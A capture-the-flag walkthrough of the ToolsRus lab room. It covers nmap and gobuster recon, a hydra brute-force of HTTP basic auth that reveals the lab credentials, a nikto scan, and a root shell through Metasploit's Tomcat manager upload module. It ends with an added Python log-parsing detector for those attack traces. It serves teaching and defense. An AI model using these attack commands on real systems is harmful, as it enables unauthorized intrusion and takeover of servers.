ToolsRus

Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):
nmap -Pn 10.10.217.167

Detailed nmap scan:
Command breakdown:
(-sV): Service version detection
(-sC): Default nmap scripts
(-p): Specifying ports 22,80,1234,8009
(-oN nmap): Saving the output to a file called nmap
nmap -sV -sC -p 22,80,1234,8009 -oN nmap 10.10.217.167

Enumeration
Port 80
Let's visit the site.

It says that the other parts of the website are still functional, so let's run gobuster to find hidden directories.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.217.167

We found two directories. Let's first visit /guidelines, which also happens to be the answer to the first question of this room.


Looks like we have a possible username, bob. This is the answer to the second question in this room.

Now let's look at the other directory, /protected. This is the answer to question 3 in this room.


It's asking us for a password. We have bob as a username, so let's use hydra to brute-force the password.
hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.217.167 http-get /protected/

We found the password bubbles, which is also the answer to the 4th question in this room.

Now we can log in.

Oh, so now we have to go to the other HTTP port, 1234, which we saw in the nmap scan. This is also the answer to the 5th question in this room.

Let's visit the site.

It's running Apache Tomcat/7.0.88, which is the answer to question 6.

The next question asks us to use nikto to scan the /manager/html directory on this port.

Let's do that.
nikto -h 10.10.217.167:1234/manager/html -id bob:bubbles
Let's also visit the web application on this port and directory. We have to log in using the same credentials; this is what it looks like after logging in.

The Nikto scan did not give me anything important as far as I know; the answer to question 7 is "5".

The answers to the next two questions can be found in the nmap scan.


Exploitation
Let's fire up Metasploit.
msfconsole

Now let's search for tomcat.
search tomcat

Looking through all the results, numbers 5 and 6 were the only ones that were both interesting and actual exploits, so I tried number 6.
use exploit/multi/http/tomcat_mgr_upload

Let's look at the options and check what we have to provide to Metasploit to exploit the system.

We need to change the following options:
Http Username
Http Password
RHOSTS
RPORT
LHOST
The command to set a value for a parameter is:
set <Parameter> <Value>

After setting everything up, let's run the exploit.
run

Now let's check who we are on the system.

And we are root, which is the answer to question 10 in this room. You can also find the last answer in /root/flag.txt.
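From the defender's side, the two loudest steps of this walkthrough (the hydra run against /protected/ and the WAR upload through the Tomcat manager) both leave clear traces in the web server's access log. The script below is an added example, not part of the room or the original writeup; it parses constructed Apache/Tomcat combined-format log lines (the IPs, timestamps and the CSRF nonce are made up) and raises alerts for a burst of 401s on the protected path, a successful login right after that burst, and any POST/PUT to the manager's deploy endpoints.

```python
import re
from collections import defaultdict

# Constructed sample lines (combined log format) mimicking the traces of the
# hydra guessing against /protected/ and the Metasploit WAR upload to the manager.
_FAIL = '10.9.0.5 - - [20/May/2024:10:01:0{n} +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/4.0 (Hydra)"'
SAMPLE_LOG = [_FAIL.format(n=i) for i in range(1, 7)] + [
    '10.9.0.5 - bob [20/May/2024:10:01:08 +0000] "GET /protected/ HTTP/1.1" 200 712 "-" "Mozilla/4.0 (Hydra)"',
    '10.9.0.7 - - [20/May/2024:10:02:00 +0000] "GET /guidelines/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.9.0.5 - bob [20/May/2024:10:03:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 9321 "-" "Mozilla/5.0"',
    'not a log line',  # malformed input must be skipped, not crash the parser
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Tomcat manager endpoints that deploy a WAR (HTML manager and text manager).
MANAGER_DEPLOY = {"/manager/html/upload", "/manager/text/deploy"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines, auth_fail_threshold=5):
    """Return (source_ip, message) alerts for brute force and manager deploys."""
    failures = defaultdict(int)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, status, path = rec["ip"], int(rec["status"]), rec["path"].split("?")[0]
        # Rule 1: repeated 401s on the protected path from one source = password guessing.
        if status == 401 and path.startswith("/protected"):
            failures[ip] += 1
            if failures[ip] == auth_fail_threshold:
                alerts.append((ip, f"{auth_fail_threshold} basic-auth failures on {path}"))
        # Rule 2: a 200 on that path after the threshold was hit = the guess succeeded.
        elif status == 200 and path.startswith("/protected") and failures[ip] >= auth_fail_threshold:
            alerts.append((ip, f"login as '{rec['user']}' on {path} after {failures[ip]} failures"))
        # Rule 3: any POST/PUT to a manager deploy endpoint is a WAR upload; always alert.
        if rec["method"] in ("POST", "PUT") and path in MANAGER_DEPLOY:
            alerts.append((ip, f"Tomcat manager deploy: {rec['method']} {path}"))
    return alerts


if __name__ == "__main__":
    for ip, msg in detect(SAMPLE_LOG):
        print(ip, msg)
```

Rule 3 fires even on a single request because a legitimate admin rarely deploys through the manager on an exposed port; tune the threshold in rule 1 to the normal failure rate of the site.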
